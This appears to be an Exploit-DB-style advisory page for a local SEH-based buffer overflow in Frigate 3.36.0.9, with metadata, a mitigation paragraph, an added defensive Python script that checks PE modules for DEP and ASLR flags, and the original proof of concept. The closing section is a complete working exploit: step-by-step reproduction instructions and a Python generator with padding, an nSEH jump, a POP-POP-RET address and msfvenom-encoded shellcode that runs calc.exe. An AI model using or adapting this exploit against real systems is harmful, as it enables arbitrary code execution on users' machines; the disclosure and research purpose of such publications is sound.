Vendor: Frigate
By: Paras Bhatia
CVSS: 7.5 (HIGH)
Type: Local Buffer Overflow
CWE: 119
Product Name: Frigate
Affected Version From:
Affected Version To: 3.36.0.9
Patch Exists: NO
Platforms Tested: Windows 7 Ultimate Service Pack 1 (32 bit - English)
Year: 2020

Frigate 3.36.0.9 – ‘Command Line’ Local Buffer Overflow (SEH) (PoC)

This proof of concept demonstrates a local, SEH-based buffer overflow in Frigate version 3.36.0.9. Pasting a specially crafted input into the 'Command Line' field of the Frigate application lets an attacker execute arbitrary code and gain control of the system. As a proof of concept, the exploit launches calc.exe. The published steps require DEP to be turned off for Frigate3.exe.

Mitigation:

No patch exists. The vendor should release one that addresses the buffer overflow with proper input validation and boundary checks on the 'Command Line' field. In the meantime, users can mitigate the risk by ensuring that the Frigate application is not accessible to untrusted sources and by leaving DEP enabled for Frigate3.exe, since the published steps require it to be turned off.
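
An added example, not part of the original advisory or the exploit author's code: the published steps require DEP to be turned off for Frigate3.exe and take an SEH handler address from rtl60.bpl, so a defender auditing an install can read each module's PE header to see whether it opts into DEP and ASLR. The function names and the constructed sample header are assumptions for illustration; SafeSEH, which is recorded in the load configuration directory, is not checked here.

```python
import struct
import sys

# Flag values from the PE/COFF specification (DllCharacteristics field).
NX_COMPAT = 0x0100      # IMAGE_DLLCHARACTERISTICS_NX_COMPAT: DEP opt-in
DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: ASLR opt-in
NO_SEH = 0x0400         # IMAGE_DLLCHARACTERISTICS_NO_SEH: module uses no SEH


def pe_mitigations(data: bytes) -> dict:
    """Return the DEP/ASLR/NO_SEH opt-in flags from a PE image's header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)   # e_lfanew
    opt_off = pe_off + 4 + 20      # skip "PE\0\0" and the 20-byte COFF header
    if data[pe_off:pe_off + 4] != b"PE\0\0" or len(data) < opt_off + 72:
        raise ValueError("not a PE file: bad or truncated PE header")
    (magic,) = struct.unpack_from("<H", data, opt_off)
    if magic not in (0x10B, 0x20B):                    # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics is at offset 70 of the optional header in both formats.
    (flags,) = struct.unpack_from("<H", data, opt_off + 70)
    return {
        "dep_nx_compat": bool(flags & NX_COMPAT),
        "aslr_dynamic_base": bool(flags & DYNAMIC_BASE),
        "no_seh": bool(flags & NO_SEH),
    }


def make_sample_pe(dll_characteristics: int) -> bytes:
    """Constructed minimal PE32 header for the demo; not a real Frigate file."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos + b"PE\0\0" + b"\0" * 20 + bytes(opt)


if __name__ == "__main__":
    for path in sys.argv[1:]:      # paths to the installed modules to audit
        with open(path, "rb") as fh:
            print(path, pe_mitigations(fh.read(4096)))
    print("sample, no opt-ins:", pe_mitigations(make_sample_pe(0)))
    print("sample, DEP+ASLR:", pe_mitigations(make_sample_pe(NX_COMPAT | DYNAMIC_BASE)))
```

A module that reports `dep_nx_compat: False` and `aslr_dynamic_base: False` depends on system-wide policy for those protections, which is worth recording while no vendor patch is available.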

Exploit-DB raw data:

# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) 
# Vendor Homepage: http://www.frigate3.com/ 
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-07
# Vulnerable Software: Frigate
# Version: <= 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: FrigateLCE.py
#   2.- Copy content to clipboard
#   3.- Turn off DEP for Frigate3.exe
#   4.- Open "Frigate3.exe"
#   5.- Go to "Command" > "Command Line" > "Activate Command Line"
#   6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
#   7.- Press Enter from Keyboard.
#   8.- Click on OK in the dialog box that appears.
#   9.- Calc.exe runs.


#################################################################################################################################################

#Python "FrigateLCE.py" Code:

f= open("FrigateLCE.txt", "w")

junk="A" * 4112

nseh="\xeb\x20\x90\x90"

seh="\x4B\x0C\x01\x40"

#40010C4B   5B               POP EBX
#40010C4C   5D               POP EBP
#40010C4D   C3               RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl]  (C:\Program Files\Frigate3\rtl60.bpl)

nops="\x90" * 50

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d"  -f python

buf =  ""
buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"




payload = junk + nseh + seh + nops + buf

f.write(payload)
f.close()